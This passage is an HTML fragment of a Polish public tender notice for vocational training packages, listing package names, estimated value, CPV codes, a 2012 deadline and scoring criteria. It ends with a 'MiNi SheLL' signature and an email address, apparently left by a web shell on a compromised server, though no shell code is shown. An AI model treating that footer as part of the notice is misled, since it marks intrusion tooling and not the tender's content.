<li>2. kwalifikacje kadry dydaktycznej - 15</li>
<li>3. doświadczenie Wykonawcy - 10</li>
<li>4. posiadanie przez Wykonawcę certyfikatów jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II dotyczy szkoleń zawodowych i  obejmuje następujące pakiety:

Pakiet II.1. Obsługa kasy fiskalnej z fakturowaniem dla 6 osób;
Pakiet II.2. Krawiec dla 1 osoby;
Pakiet II.3. Fryzjer dla 1 osoby;
Pakiet II.4. Kucharz dla 1 osoby;
Pakiet II.5. Operator koparko-ładowarki dla 4 osób;
Pakiet II.6. Opiekunka chorego i osoby starszej dla 1 osoby;
Pakiet II.7. Drwal - operator pilarki dla 1 osoby..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenia zawodowe  zaś mają dostarczyć uczestnikom szkoleń umiejętności praktycznych wraz z uprawnieniami do wykonywania  czynności w danym zawodzie.
Wartość szacunkowa zamówienia, obejmująca pakiety od II.1 do II.7 (bez VAT) w PLN: 38000,00-42000,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 85.70.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. kwalifikacje kadry dydaktycznej - 15</li>
<li>3. doświadczenie Wykonawcy - 10</li>
<li>4. posiadanie przez Wykonawcę certyfikatów jakości usług - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com